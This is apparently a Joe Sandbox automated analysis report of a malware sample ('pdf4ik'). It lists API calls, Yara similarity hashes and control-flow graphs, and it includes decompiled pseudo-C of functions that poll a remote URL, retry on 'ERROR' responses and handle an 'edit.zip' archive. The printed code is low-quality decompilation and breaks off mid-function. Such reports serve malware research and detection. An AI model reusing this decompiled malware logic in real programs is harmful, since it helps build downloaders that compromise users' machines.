                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleHeapOpen_memset$AllocateCrackFileOptionProcessReadlstrlen
                                        • String ID: <$@$http$https
                                        • API String ID: 2133551499-3936193055
                                        • Opcode ID: 9cd574e058fe53d5c2b30120ba80d1c3b9db3041b118c1cb1911f1eadffcdc3b
                                        • Instruction ID: e7ca77dce8af06307bffbfbc72c538adc4e49d3394c314a6fbed2558de998fb5
                                        • Opcode Fuzzy Hash: 9cd574e058fe53d5c2b30120ba80d1c3b9db3041b118c1cb1911f1eadffcdc3b
                                        • Instruction Fuzzy Hash: D751E3B2A90258AFE710EF94CC85F9A77B8EB04B01F0084A9F609E7181DB746A45CF64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph (function at 29d8ed40)
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,0000EA60), ref: 29D8ED4E
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 29D8ED55
                                        • lstrcatA.KERNEL32(00000000,?), ref: 29D8ED62
                                        • _strtok_s.LIBCMT ref: 29D8ED7A
                                        • StrCmpCA.SHLWAPI(00000000,29DCFA98), ref: 29D8EDB4
                                        • StrCmpCA.SHLWAPI(00000000,29DCFA98), ref: 29D8EDD3
                                        • StrCmpCA.SHLWAPI(00000000,29DCFA98), ref: 29D8EDF2
                                        • StrCmpCA.SHLWAPI(00000000,29DCFA98), ref: 29D8EE11
                                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 29D8EE31
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 29D8EE38
                                        • StrCmpCA.SHLWAPI(00000000,29DCFA98), ref: 29D8EE4E
                                        • StrCmpCA.SHLWAPI(00000000,29DCFA98), ref: 29D8EE6D
                                        • StrCmpCA.SHLWAPI(00000000,29DCFA98), ref: 29D8EE85
                                        • StrCmpCA.SHLWAPI(00000000,29DCFA98), ref: 29D8EE9D
                                        • StrCmpCA.SHLWAPI(00000000,29DCFA98), ref: 29D8EEB5
                                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 29D8EECE
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 29D8EED5
                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 29D8EEE2
                                        • _strtok_s.LIBCMT ref: 29D8EEF2
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateProcess$_strtok_slstrcat
                                        • String ID:
                                        • API String ID: 2861863855-0
                                        • Opcode ID: 5764c25c5218a2588e8135c7b4bfa188f0cf1ce009526bfe756020f6cc4e256c
                                        • Instruction ID: 46679960e5a718cd28119e140303c78251f4ff964c842c4bc4768f17b6b07393
                                        • Opcode Fuzzy Hash: 5764c25c5218a2588e8135c7b4bfa188f0cf1ce009526bfe756020f6cc4e256c
                                        • Instruction Fuzzy Hash: A14184335C5282ABE343FA745805E9B3B6C7F25B82B84C56DF800E3906E6294607BB75
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph (function at 29d93e30)
                                        C-Code - Quality: 28%
                                        			E29D93E30() {
                                        				signed int _v8;
                                        				char _v16;
                                        				signed int _v20;
                                        				char _v280;
                                        				signed int _v288;
                                        				char _v292;
                                        				char _v308;
                                        				intOrPtr _v316;
                                        				char _v336;
                                        				intOrPtr _v340;
                                        				intOrPtr _v344;
                                        				intOrPtr _v348;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t137;
                                        				signed int _t138;
                                        				void* _t145;
                                        				intOrPtr* _t149;
                                        				intOrPtr* _t151;
                                        				void* _t152;
                                        				void* _t153;
                                        				void* _t155;
                                        				void* _t156;
                                        				void* _t162;
                                        				intOrPtr* _t166;
                                        				intOrPtr* _t168;
                                        				void* _t170;
                                        				void* _t172;
                                        				intOrPtr* _t175;
                                        				intOrPtr* _t181;
                                        				void* _t183;
                                        				void* _t185;
                                        				intOrPtr* _t188;
                                        				void* _t190;
                                        				intOrPtr* _t194;
                                        				void* _t196;
                                        				intOrPtr* _t199;
                                        				void* _t201;
                                        				intOrPtr* _t204;
                                        				void* _t206;
                                        				intOrPtr* _t210;
                                        				signed int _t211;
                                        				void* _t212;
                                        				void* _t214;
                                        				intOrPtr* _t217;
                                        				intOrPtr* _t224;
                                        				signed int _t231;
                                        				signed int _t232;
                                        				signed int _t233;
                                        				void* _t234;
                                        				signed int _t235;
                                        				signed int _t236;
                                        				char* _t244;
                                        				char* _t245;
                                        				intOrPtr _t247;
                                        				void* _t252;
                                        				signed int _t267;
                                        				void* _t272;
                                        				signed int _t276;
                                        				void* _t282;
                                        				void* _t306;
                                        				void* _t308;
                                        				signed int _t309;
                                        				void* _t310;
                                        				void* _t312;
                                        				intOrPtr _t313;
                                        				intOrPtr _t314;
                                        				void* _t315;
                                        				intOrPtr _t317;
                                        				intOrPtr _t318;
                                        				intOrPtr _t319;
                                        				char* _t320;
                                        				intOrPtr _t321;
                                        				intOrPtr _t322;
                                        				char* _t323;
                                        				char* _t324;
                                        				intOrPtr _t325;
                                        				char* _t326;
                                        				char* _t327;
                                        				void* _t330;
                                        				void* _t334;
                                        				void* _t337;
                                        				void* _t341;
                                        				void* _t344;
                                        				void* _t346;
                                        				void* _t348;
                                        				void* _t350;
                                        				void* _t352;
                                        				void* _t354;
                                        
                                        				_push(0xffffffff);
                                        				_push(E29DC3104);
                                        				_push( *[fs:0x0]);
                                        				_t137 =  *0x29dd5664; // 0xd9555f04
                                        				_t138 = _t137 ^ _t309;
                                        				_v20 = _t138;
                                        				_push(_t231);
                                        				_push(_t138);
                                        				 *[fs:0x0] =  &_v16;
                                        				E29DB5640( &_v280, 0, 0x104);
                                        				_t312 = _t310 - 0x14c + 0xc;
                                        				_t238 =  &_v280;
                                        				lstrcatA( &_v280, "/");
                                        				_t232 = _t231 | 0xffffffff;
                                        				_t328 = _t232;
                                        				while(1) {
                                        					_push("|");
                                        					_t313 = _t312 - 0x1c;
                                        					_v348 = _t313;
                                        					E29D8E8B0(_t238, _t313);
                                        					_t314 = _t313 - 0x1c;
                                        					_v8 = 2;
                                        					_v340 = _t314;
                                        					E29D8E8E0(_t238, _t314);
                                        					_v8 = 3;
                                        					_t145 = E29D8E8E0(_t238,  &_v308);
                                        					_v8 = 4;
                                        					_push( *((intOrPtr*)(_t145 + 0x10)) + 1);
                                        					_v8 = 5;
                                        					E29D923B0(_t328); // executed
                                        					_t267 = 0x10;
                                        					_t315 = _t314 + 0x40;
                                        					_v8 = _t232;
                                        					if(_v288 >= 0x10) {
                                        						_t246 = _v308;
                                        						_push(_v308);
                                        						E29DADF3B();
                                        						_t315 = _t315 + 4;
                                        					}
                                        					_t149 =  *0x29dd62cc; // 0x2bab2a50
                                        					_v288 = 0xf;
                                        					_v292 = 0;
                                        					_v308 = 0;
                                        					_t330 =  *0x29dd62e0 - _t267; // 0x1f
                                        					if(_t330 < 0) {
                                        						_t149 = 0x29dd62cc;
                                        					}
                                        					_push("ERROR");
                                        					_push(_t149);
                                        					if( *0x29dd8550() == 0) {
                                        						goto L9;
                                        					}
                                        					_t325 = _t315 - 0x1c;
                                        					_v340 = _t325;
                                        					E29D8E910(_t238, _t325);
                                        					_t326 = _t325 - 0x1c;
                                        					_v8 = 6;
                                        					_t245 = _t326;
                                        					_t224 =  &_v280;
                                        					 *((intOrPtr*)(_t245 + 0x14)) = 0xf;
                                        					 *((intOrPtr*)(_t245 + 0x10)) = 0;
                                        					_v348 = _t326;
                                        					 *_t245 = 0;
                                        					_t308 = _t224 + 1;
                                        					do {
                                        						_t246 =  *_t224;
                                        						_t224 = _t224 + 1;
                                        					} while (_t246 != 0);
                                        					E29D892C0(_t245,  &_v280, _t224 - _t308);
                                        					_t327 = _t326 - 0x1c;
                                        					_t238 = _t327;
                                        					_v8 = 7;
                                        					_v344 = _t327;
                                        					 *((intOrPtr*)(_t238 + 0x14)) = 0xf;
                                        					 *((intOrPtr*)(_t238 + 0x10)) = 0;
                                        					 *_t238 = 0;
                                        					E29D894C0(_t238, 0x29dd62cc, 0, _t232);
                                        					_v8 = _t232;
                                        					E29D925A0(); // executed
                                        					_t315 = _t327 + 0x54;
                                        					_t267 = 0x10;
                                        					L9:
                                        					_t151 =  *0x29dd62cc; // 0x2bab2a50
                                        					_t334 =  *0x29dd62e0 - _t267; // 0x1f
                                        					if(_t334 < 0) {
                                        						_t151 = 0x29dd62cc;
                                        					}
                                        					_t152 =  *0x29dd8550(_t151, "ERROR");
                                        					_t335 = _t152;
                                        					if(_t152 != 0) {
                                        						_t153 = E29D8E9A0(_t238,  &_v308);
                                        						_v8 = 0x10;
                                        						E29D891D0(_t153, "edit.zip");
                                        						_v8 = _t232;
                                        						_t233 = 0x10;
                                        						__eflags = _v288 - 0x10;
                                        						if(_v288 >= 0x10) {
                                        							_push(_v308);
                                        							E29DADF3B();
                                        							_t315 = _t315 + 4;
                                        						}
                                        						_t155 = E29D8E910(_t238,  &_v308);
                                        						_v8 = 0x11;
                                        						goto L73;
                                        					} else {
                                        						_push("|");
                                        						_t317 = _t315 - 0x1c;
                                        						_v344 = _t317;
                                        						E29D8E940(_t238, _t317);
                                        						_t318 = _t317 - 0x1c;
                                        						_v8 = 0xa;
                                        						_v340 = _t318;
                                        						E29D8E8E0(_t238, _t318);
                                        						_v8 = 0xb;
                                        						_t162 = E29D8E8E0(_t238,  &_v308);
                                        						_v8 = 0xc;
                                        						_push( *((intOrPtr*)(_t162 + 0x10)) + 1);
                                        						_v8 = 0xd;
                                        						E29D923B0(_t335);
                                        						_t276 = 0x10;
                                        						_t315 = _t318 + 0x40;
                                        						_v8 = _t232;
                                        						if(_v288 >= 0x10) {
                                        							_t238 = _v308;
                                        							_push(_v308);
                                        							E29DADF3B();
                                        							_t315 = _t315 + 4;
                                        						}
                                        						_t166 =  *0x29dd62cc; // 0x2bab2a50
                                        						_v288 = 0xf;
                                        						_v292 = 0;
                                        						_v308 = 0;
                                        						_t337 =  *0x29dd62e0 - _t276; // 0x1f
                                        						if(_t337 < 0) {
                                        							_t166 = 0x29dd62cc;
                                        						}
                                        						_push("ERROR");
                                        						_push(_t166);
                                        						if( *0x29dd8550() != 0) {
                                        							_t322 = _t315 - 0x1c;
                                        							_v344 = _t322;
                                        							E29D8E910(_t238, _t322);
                                        							_t323 = _t322 - 0x1c;
                                        							_v8 = 0xe;
                                        							_t244 = _t323;
                                        							_t217 =  &_v280;
                                        							 *((intOrPtr*)(_t244 + 0x14)) = 0xf;
                                        							 *((intOrPtr*)(_t244 + 0x10)) = 0;
                                        							_v340 = _t323;
                                        							 *_t244 = 0;
                                        							_t306 = _t217 + 1;
                                        							do {
                                        								_t247 =  *_t217;
                                        								_t217 = _t217 + 1;
                                        							} while (_t247 != 0);
                                        							_t246 =  &_v280;
                                        							E29D892C0(_t244,  &_v280, _t217 - _t306);
                                        							_t324 = _t323 - 0x1c;
                                        							_t238 = _t324;
                                        							_v8 = 0xf;
                                        							_v348 = _t324;
                                        							 *((intOrPtr*)(_t238 + 0x14)) = 0xf;
                                        							 *((intOrPtr*)(_t238 + 0x10)) = 0;
                                        							 *_t238 = 0;
                                        							E29D894C0(_t238, 0x29dd62cc, 0, _t232);
                                        							_v8 = _t232;
                                        							E29D925A0();
                                        							_t315 = _t324 + 0x54;
                                        							_t276 = 0x10;
                                        						}
                                        						_t168 =  *0x29dd62cc; // 0x2bab2a50
                                        						_t341 =  *0x29dd62e0 - _t276; // 0x1f
                                        						if(_t341 < 0) {
                                        							_t168 = 0x29dd62cc;
                                        						}
                                        						_push("ERROR");
                                        						_push(_t168);
                                        						if( *0x29dd8550() != 0) {
                                        							_t170 = E29D8E9A0(_t238,  &_v308);
                                        							_v8 = 0x1a;
                                        							E29D891D0(_t170, "edit.zip");
                                        							_v8 = _t232;
                                        							_t235 = 0x10;
                                        							__eflags = _v288 - 0x10;
                                        							if(_v288 >= 0x10) {
                                        								_t238 = _v308;
                                        								_push(_v308);
                                        								E29DADF3B();
                                        								_t315 = _t315 + 4;
                                        							}
                                        							_t172 = E29D8E910(_t238,  &_v308);
                                        							_v8 = 0x1b;
                                        							goto L59;
                                        						} else {
                                        							_t319 = _t315 - 0x1c;
                                        							_v344 = _t319;
                                        							E29D8E910(_t238, _t319);
                                        							_t320 = _t319 - 0x1c;
                                        							_v8 = 0x12;
                                        							_t238 = _t320;
                                        							_t175 =  &_v280;
                                        							 *((intOrPtr*)(_t238 + 0x14)) = 0xf;
                                        							 *((intOrPtr*)(_t238 + 0x10)) = 0;
                                        							_v340 = _t320;
                                        							 *_t238 = 0;
                                        							_t282 = _t175 + 1;
                                        							do {
                                        								_t246 =  *_t175;
                                        								_t175 = _t175 + 1;
                                        							} while (_t246 != 0);
                                        							E29D892C0(_t238,  &_v280, _t175 - _t282);
                                        							_t321 = _t320 - 0x1c;
                                        							_v8 = 0x13;
                                        							_v348 = _t321;
                                        							E29D8E970(_t238, _t321);
                                        							_v8 = _t232;
                                        							E29D925A0();
                                        							_t181 =  *0x29dd62cc; // 0x2bab2a50
                                        							_t315 = _t321 + 0x54;
                                        							_t344 =  *0x29dd62e0 - 0x10; // 0x1f
                                        							if(_t344 < 0) {
                                        								_t181 = 0x29dd62cc;
                                        							}
                                        							_push("ERROR");
                                        							_push(_t181);
                                        							if( *0x29dd8550() != 0) {
                                        								_t183 = E29D8E9A0(_t238,  &_v308);
                                        								_v8 = 0x24;
                                        								E29D891D0(_t183, "edit.zip");
                                        								_v8 = _t232;
                                        								_t236 = 0x10;
                                        								__eflags = _v288 - 0x10;
                                        								if(_v288 >= 0x10) {
                                        									_t246 = _v308;
                                        									_push(_v308);
                                        									E29DADF3B();
                                        									_t315 = _t315 + 4;
                                        								}
                                        								_t185 = E29D8E910(_t238,  &_v308);
                                        								_v8 = 0x25;
                                        								goto L54;
                                        							} else {
                                        								_t188 =  *0x29dd62cc; // 0x2bab2a50
                                        								_t346 =  *0x29dd62e0 - 0x10; // 0x1f
                                        								if(_t346 < 0) {
                                        									_t188 = 0x29dd62cc;
                                        								}
                                        								_push("ERROR");
                                        								_push(_t188);
                                        								if( *0x29dd8550() != 0) {
                                        									_t190 = E29D8E9D0(_t238,  &_v308);
                                        									_v8 = 0x2e;
                                        									E29D891D0(_t190, "edit.zip");
                                        									_v8 = _t232;
                                        									_t233 = 0x10;
                                        									__eflags = _v288 - 0x10;
                                        									if(_v288 >= 0x10) {
                                        										_push(_v308);
                                        										E29DADF3B();
                                        										_t315 = _t315 + 4;
                                        									}
                                        									_t155 = E29D8EA00(_t238,  &_v308);
                                        									_v8 = 0x2f;
                                        									goto L73;
                                        								} else {
                                        									_t194 =  *0x29dd62cc; // 0x2bab2a50
                                        									_t348 =  *0x29dd62e0 - 0x10; // 0x1f
                                        									if(_t348 < 0) {
                                        										_t194 = 0x29dd62cc;
                                        									}
                                        									_push("ERROR");
                                        									_push(_t194);
                                        									if( *0x29dd8550() != 0) {
                                        										_t196 = E29D8EA00(_t238,  &_v308);
                                        										_v8 = 0x38;
                                        										E29D891D0(_t196, "edit.zip");
                                        										_v8 = _t232;
                                        										_t235 = 0x10;
                                        										__eflags = _v288 - 0x10;
                                        										if(_v288 >= 0x10) {
                                        											_t238 = _v308;
                                        											_push(_v308);
                                        											E29DADF3B();
                                        											_t315 = _t315 + 4;
                                        										}
                                        										_t172 = E29D8EA00(_t238,  &_v308);
                                        										_v8 = 0x39;
                                        										L59:
                                        										_t156 = E29D891D0(_t172, 0x29dd6304);
                                        										__eflags = _v288 - _t235;
                                        										if(_v288 >= _t235) {
                                        											_t246 = _v308;
                                        											_push(_v308);
                                        											goto L75;
                                        										}
                                        									} else {
                                        										_t199 =  *0x29dd62cc; // 0x2bab2a50
                                        										_t350 =  *0x29dd62e0 - 0x10; // 0x1f
                                        										if(_t350 < 0) {
                                        											_t199 = 0x29dd62cc;
                                        										}
                                        										_push("ERROR");
                                        										_push(_t199);
                                        										if( *0x29dd8550() != 0) {
                                        											_t201 = E29D8EA00(_t238,  &_v308);
                                        											_v8 = 0x42;
                                        											E29D891D0(_t201, "edit.zip");
                                        											_v8 = _t232;
                                        											_t236 = 0x10;
                                        											__eflags = _v288 - 0x10;
                                        											if(_v288 >= 0x10) {
                                        												_t246 = _v308;
                                        												_push(_v308);
                                        												E29DADF3B();
                                        												_t315 = _t315 + 4;
                                        											}
                                        											_t185 = E29D8EA00(_t238,  &_v308);
                                        											_v8 = 0x43;
                                        											L54:
                                        											_t156 = E29D891D0(_t185, 0x29dd6304);
                                        											__eflags = _v288 - _t236;
                                        											if(_v288 >= _t236) {
                                        												_push(_v308);
                                        												goto L75;
                                        											}
                                        										} else {
                                        											_t204 =  *0x29dd62cc; // 0x2bab2a50
                                        											_t352 =  *0x29dd62e0 - 0x10; // 0x1f
                                        											if(_t352 < 0) {
                                        												_t204 = 0x29dd62cc;
                                        											}
                                        											_push("ERROR");
                                        											_push(_t204);
                                        											if( *0x29dd8550() != 0) {
                                        												_t206 = E29D8EA00(_t238,  &_v308);
                                        												_v8 = 0x4c;
                                        												E29D891D0(_t206, "edit.zip");
                                        												_v8 = _t232;
                                        												_t233 = 0x10;
                                        												__eflags = _v288 - 0x10;
                                        												if(_v288 >= 0x10) {
                                        													_push(_v308);
                                        													E29DADF3B();
                                        													_t315 = _t315 + 4;
                                        												}
                                        												_t155 = E29D8EA00(_t238,  &_v308);
                                        												_v8 = 0x4d;
                                        												L73:
                                        												_t156 = E29D891D0(_t155, 0x29dd6304);
                                        												__eflags = _v288 - _t233;
                                        												if(_v288 >= _t233) {
                                        													_push(_v308);
                                        													goto L75;
                                        												}
                                        											} else {
                                        												_t210 =  *0x29dd62cc; // 0x2bab2a50
                                        												_t354 =  *0x29dd62e0 - 0x10; // 0x1f
                                        												if(_t354 < 0) {
                                        													_t210 = 0x29dd62cc;
                                        												}
                                        												_t211 =  *0x29dd8550(_t210, "ERROR");
                                        												_t328 = _t211;
                                        												if(_t211 != 0) {
                                        													_t212 = E29D8EA00(_t238,  &_v308);
                                        													_v8 = 0x4e;
                                        													E29D891D0(_t212, "edit.zip");
                                        													_v8 = _t232;
                                        													__eflags = _v288 - 0x10;
                                        													if(_v288 >= 0x10) {
                                        														_t238 = _v308;
                                        														_push(_v308);
                                        														E29DADF3B();
                                        														_t315 = _t315 + 4;
                                        													}
                                        													_t214 = E29D8EA00(_t238,  &_v336);
                                        													_v8 = 0x4f;
                                        													_t156 = E29D891D0(_t214, 0x29dd6304);
                                        													__eflags = _v316 - 0x10;
                                        													if(_v316 >= 0x10) {
                                        														_t246 = _v336;
                                        														_push(_v336);
                                        														L75:
                                        														_t156 = E29DADF3B();
                                        													}
                                        												} else {
                                        													Sleep(0xea60);
                                        													continue;
                                        												}
                                        											}
                                        										}
                                        									}
                                        								}
                                        							}
                                        						}
                                        					}
                                        					 *[fs:0x0] = _v16;
                                        					_pop(_t252);
                                        					_pop(_t272);
                                        					_pop(_t234);
                                        					__eflags = _v20 ^ _t309;
                                        					return E29DADF46(_t156, _t234, _v20 ^ _t309, _t246, _t252, _t272);
                                        				}
                                        			}
                                        0x29d9442e
                                        0x29d94437
                                        0x29d9443c
                                        0x29d94443
                                        0x29d9444a
                                        0x29d9444f
                                        0x29d94455
                                        0x29d9445b
                                        0x29d94461
                                        0x00000000
                                        0x29d94461
                                        0x29d9423c
                                        0x29d9423c
                                        0x29d94241
                                        0x29d94247
                                        0x29d94249
                                        0x29d94249
                                        0x29d9424e
                                        0x29d94253
                                        0x29d9425c
                                        0x29d94387
                                        0x29d94393
                                        0x29d9439a
                                        0x29d9439f
                                        0x29d943a2
                                        0x29d943a7
                                        0x29d943ad
                                        0x29d943af
                                        0x29d943b5
                                        0x29d943b6
                                        0x29d943bb
                                        0x29d943bb
                                        0x29d943c4
                                        0x29d943c9
                                        0x29d943d0
                                        0x29d943d7
                                        0x29d943dc
                                        0x29d943e2
                                        0x29d943ee
                                        0x00000000
                                        0x29d943ee
                                        0x29d94262
                                        0x29d94262
                                        0x29d94267
                                        0x29d9426d
                                        0x29d9426f
                                        0x29d9426f
                                        0x29d94274
                                        0x29d94279
                                        0x29d94282
                                        0x29d94333
                                        0x29d9433f
                                        0x29d94346
                                        0x29d9434b
                                        0x29d9434e
                                        0x29d94353
                                        0x29d94359
                                        0x29d94361
                                        0x29d94362
                                        0x29d94367
                                        0x29d94367
                                        0x29d94370
                                        0x29d94375
                                        0x29d945b2
                                        0x29d945b9
                                        0x29d945be
                                        0x29d945c4
                                        0x29d945cc
                                        0x00000000
                                        0x29d945cc
                                        0x29d94288
                                        0x29d94288
                                        0x29d9428d
                                        0x29d94293
                                        0x29d94295
                                        0x29d94295
                                        0x29d942a0
                                        0x29d942a6
                                        0x29d942a8
                                        0x29d942c0
                                        0x29d942cc
                                        0x29d942d3
                                        0x29d942d8
                                        0x29d942e0
                                        0x29d942e6
                                        0x29d942e8
                                        0x29d942ee
                                        0x29d942ef
                                        0x29d942f4
                                        0x29d942f4
                                        0x29d942fd
                                        0x29d94309
                                        0x29d94310
                                        0x29d94315
                                        0x29d9431b
                                        0x29d94321
                                        0x29d94327
                                        0x29d945cd
                                        0x29d945cd
                                        0x29d945d2
                                        0x29d942aa
                                        0x29d942af
                                        0x00000000
                                        0x29d942af
                                        0x29d942a8
                                        0x29d94282
                                        0x29d9425c
                                        0x29d94236
                                        0x29d94210
                                        0x29d941ea
                                        0x29d9414f
                                        0x29d945d8
                                        0x29d945e0
                                        0x29d945e1
                                        0x29d945e2
                                        0x29d945e6
                                        0x29d945f0
                                        0x29d945f0

                                        APIs
                                        • _memset.LIBCMT ref: 29D93E6C
                                        • lstrcatA.KERNEL32(?,29DCFC34), ref: 29D93E80
                                          • Part of subcall function 29D923B0: StrCmpCA.SHLWAPI(?,ERROR), ref: 29D92491
                                        • StrCmpCA.SHLWAPI(2BAB2A50,ERROR), ref: 29D93F33
                                        • StrCmpCA.SHLWAPI(2BAB2A50,ERROR), ref: 29D93FE7
                                        • StrCmpCA.SHLWAPI(2BAB2A50,ERROR), ref: 29D94093
                                        • StrCmpCA.SHLWAPI(2BAB2A50,ERROR), ref: 29D94147
                                        • StrCmpCA.SHLWAPI(2BAB2A50,ERROR), ref: 29D941E2
                                        • StrCmpCA.SHLWAPI(2BAB2A50,ERROR), ref: 29D94208
                                        • StrCmpCA.SHLWAPI(2BAB2A50,ERROR), ref: 29D9422E
                                        • StrCmpCA.SHLWAPI(2BAB2A50,ERROR), ref: 29D94254
                                        • StrCmpCA.SHLWAPI(2BAB2A50,ERROR), ref: 29D9427A
                                        • StrCmpCA.SHLWAPI(2BAB2A50,ERROR), ref: 29D942A0
                                        • Sleep.KERNEL32(0000EA60), ref: 29D942AF
                                          • Part of subcall function 29D891D0: _memmove.LIBCMT ref: 29D89203
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Sleep_memmove_memsetlstrcat
                                        • String ID: %$ERROR$edit.zip
                                        • API String ID: 801833505-3780004840
                                        • Opcode ID: e879e65e4bca1cf1ed29448370f1a562d445ccc8533f85e4ef401708c959975f
                                        • Instruction ID: 02e5e964b2044a426c077f5626eaf3db2d13af632c886e20f81fac4d25df4fc0
                                        • Opcode Fuzzy Hash: e879e65e4bca1cf1ed29448370f1a562d445ccc8533f85e4ef401708c959975f
                                        • Instruction Fuzzy Hash: B9128BB2D10268ABDB10EF64C9497CDBAB4BB15704F4085EDD508AB602C7749B4BEFE1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1948 29d925a0-29d925ec 1949 29d925ee 1948->1949 1950 29d925f1-29d9264f call 29db5640 * 2 lstrlenA InternetCrackUrlA 1948->1950 1949->1950 1955 29d92651 1950->1955 1956 29d92656-29d926d2 StrCmpCA call 29d894c0 * 2 call 29d91560 call 29d891d0 1950->1956 1955->1956 1965 29d926e3-29d926fa 1956->1965 1966 29d926d4-29d926e0 call 29dadf3b 1956->1966 1968 29d926fc 1965->1968 1969 29d926ff-29d92712 StrCmpCA 1965->1969 1966->1965 1968->1969 1971 29d92714-29d92726 call 29d894c0 1969->1971 1972 29d92736-29d9273d call 29d892c0 1969->1972 1977 29d92728 1971->1977 1978 29d9272b-29d9272c call 29d8ed40 1971->1978 1975 29d92742-29d9274b 1972->1975 1979 29d9274d 1975->1979 1980 29d92750-29d92755 1975->1980 1977->1978 1984 29d92731-29d92734 1978->1984 1979->1980 1982 29d92763-29d9276f 1980->1982 1983 29d92757-29d92760 call 29dadf3b 1980->1983 1986 29d9277d-29d92789 1982->1986 1987 29d92771-29d9277a call 29dadf3b 1982->1987 1983->1982 1984->1975 1988 29d9278b-29d92794 call 29dadf3b 1986->1988 1989 29d92797-29d927a3 1986->1989 1987->1986 1988->1989 1993 29d927b1-29d927cc call 29dadf46 1989->1993 1994 29d927a5-29d927ae call 29dadf3b 1989->1994 1994->1993
                                        C-Code - Quality: 37%
                                        			E29D925A0(CHAR* _a4, char _a20, intOrPtr _a24, char _a32, char _a48, intOrPtr _a52, char _a60, intOrPtr _a80) {
                                        				char _v8;
                                        				char _v16;
                                        				signed int _v20;
                                        				char _v84;
                                        				intOrPtr _v92;
                                        				char _v96;
                                        				char _v112;
                                        				intOrPtr _v120;
                                        				char _v124;
                                        				char _v140;
                                        				intOrPtr _v144;
                                        				intOrPtr _v148;
                                        				intOrPtr _v200;
                                        				char* _v204;
                                        				void* _v208;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t69;
                                        				signed int _t70;
                                        				int _t77;
                                        				char* _t78;
                                        				void* _t83;
                                        				char* _t85;
                                        				char* _t88;
                                        				char* _t93;
                                        				void* _t98;
                                        				char* _t100;
                                        				char* _t101;
                                        				void* _t116;
                                        				CHAR* _t118;
                                        				void* _t121;
                                        				signed int _t122;
                                        				void* _t123;
                                        				void* _t124;
                                        				void* _t125;
                                        				char* _t126;
                                        				char* _t127;
                                        				void* _t128;
                                        
                                        				_push(0xffffffff);
                                        				_push(E29DC2C16);
                                        				_push( *[fs:0x0]);
                                        				_t124 = _t123 - 0xc0;
                                        				_t69 =  *0x29dd5664; // 0xd9555f04
                                        				_t70 = _t69 ^ _t122;
                                        				_v20 = _t70;
                                        				_push(_t70);
                                        				 *[fs:0x0] =  &_v16;
                                        				_v8 = 0;
                                        				_v92 = 0xf;
                                        				_v96 = 0;
                                        				_v112 = 0;
                                        				_v8 = 3;
                                        				_t118 = _a4;
                                        				if(_a24 < 0x10) {
                                        					_t118 =  &_a4;
                                        				}
                                        				E29DB5640( &_v84, 0, 0x40);
                                        				E29DB5640( &_v208, 0, 0x3c);
                                        				_t125 = _t124 + 0x18;
                                        				_v208 = 0x3c;
                                        				_v204 =  &_v84;
                                        				_v200 = 0x40;
                                        				_t77 = InternetCrackUrlA(_t118, lstrlenA(_t118), 0x10000000,  &_v208);
                                        				_t131 = _t77;
                                        				_t78 = _v204;
                                        				if(_t77 == 0) {
                                        					_t78 = "http";
                                        				}
                                        				 *0x29dd8550(_t78, "https");
                                        				_t126 = _t125 - 0x1c;
                                        				_t100 = _t126;
                                        				_v148 = _t126;
                                        				_t111 =  &_a60;
                                        				 *((intOrPtr*)(_t100 + 0x14)) = 0xf;
                                        				 *((intOrPtr*)(_t100 + 0x10)) = 0;
                                        				 *_t100 = 0;
                                        				E29D894C0(_t100,  &_a60, 0, 0xffffffff);
                                        				_push(0);
                                        				_t127 = _t126 - 0x1c;
                                        				_t101 = _t127;
                                        				_v144 = _t127;
                                        				_v8 = 4;
                                        				 *((intOrPtr*)(_t101 + 0x14)) = 0xf;
                                        				 *((intOrPtr*)(_t101 + 0x10)) = 0;
                                        				 *_t101 = 0;
                                        				E29D894C0(_t101,  &_a4, 0, 0xffffffff);
                                        				_push( &_v140);
                                        				_v8 = 3;
                                        				_t83 = E29D91560(_t131); // executed
                                        				_t128 = _t127 + 0x40;
                                        				_v8 = 5;
                                        				E29D891D0(_t83,  &_v112);
                                        				_v8 = 3;
                                        				if(_v120 >= 0x10) {
                                        					_t111 = _v140;
                                        					_push(_v140);
                                        					E29DADF3B();
                                        					_t128 = _t128 + 4;
                                        				}
                                        				_t85 = _v112;
                                        				_v120 = 0xf;
                                        				_v124 = 0;
                                        				_v140 = 0;
                                        				if(_v92 < 0x10) {
                                        					_t85 =  &_v112;
                                        				}
                                        				_push("ERROR");
                                        				_push(_t85);
                                        				if( *0x29dd8550() == 0) {
                                        					E29D892C0(0x29dd62cc, "ERROR", 5);
                                        				} else {
                                        					E29D894C0(0x29dd62cc,  &_a4, 0, 0xffffffff);
                                        					_t93 = _v112;
                                        					_t135 = _v92 - 0x10;
                                        					if(_v92 < 0x10) {
                                        						_t93 =  &_v112;
                                        					}
                                        					E29D8ED40(0, 0xf, _t135, _t93); // executed
                                        					_t128 = _t128 + 4;
                                        				}
                                        				_t88 = _v112;
                                        				_v96 = 0;
                                        				if(_v92 < 0x10) {
                                        					_t88 =  &_v112;
                                        				}
                                        				 *_t88 = 0;
                                        				if(_v92 >= 0x10) {
                                        					_push(_v112);
                                        					_t88 = E29DADF3B();
                                        					_t128 = _t128 + 4;
                                        				}
                                        				_v92 = 0xf;
                                        				_v96 = 0;
                                        				_v112 = 0;
